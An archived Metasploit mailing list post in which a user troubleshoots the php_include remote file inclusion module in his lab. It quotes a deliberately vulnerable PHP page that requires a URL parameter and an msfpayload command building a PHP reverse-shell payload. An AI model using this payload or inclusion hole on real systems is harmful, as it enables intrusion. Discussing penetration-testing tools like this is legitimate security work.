Metasploit mailing list archives
php_include confusion
From: Jeffs <jeffs () speakeasy net>
Date: Mon, 12 Jul 2010 19:07:30 -0400
In metapsloit when using the /unix/webapp/php_include the attacker is asked to include a value for PHPURI such as /slogin_lib.inc.php?slogin_path=XXpathXX
Regarding the XXpathXX value, am I correct to assume this passes through to the metasploit engine to construct an obfuscated string that is then sent to the vulnerable site, appended to the URL automatically?
All documentation and information on using this exploit suggests that if you are not going to use the PHPRFIDB setting, to leave this as "XXpathXX".
However all my experimentation does not send a specific url to the vulnerable site as is demonstrated in several videos on this subject.
I know my rhost and lhost are correct, along with all other settings. The apache server runs php and is accessible. The metapsloit service just hangs at:
[*] PHP include server started. index_test.php looks like this: <html> <body> <? require $_GET['include'] ?> </body> </html> and include.php.txt was created properly with msfpayload as such../msfpayload php/reverse_php LHOST=192.168.1.101 R > /var/www/include.php.txt
Both files on the are the web server in the proper directories.If someone could clarify the XXpathXX value for me that would be greatly appreciated.
Thanks much jeffs _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: Meterpreter unexpectedly closes, (continued)
- Re: Meterpreter unexpectedly closes Alex Polychronopoulos (Jul 10)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Devin Kinch (Jul 11)
- Re: uploadexec and kitrap0d Rob Fuller (Jul 12)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- php_include confusion Jeffs (Jul 12)
- Re: php_include confusion egypt (Jul 12)
- Re: php_include confusion HD Moore (Jul 12)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- Re: Meterpreter unexpectedly closes Alex Polychronopoulos (Jul 10)
- Re: Meterpreter unexpectedly closes CED (Jul 10)
- Re: Meterpreter unexpectedly closes Joshua J. Drake (Jul 11)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)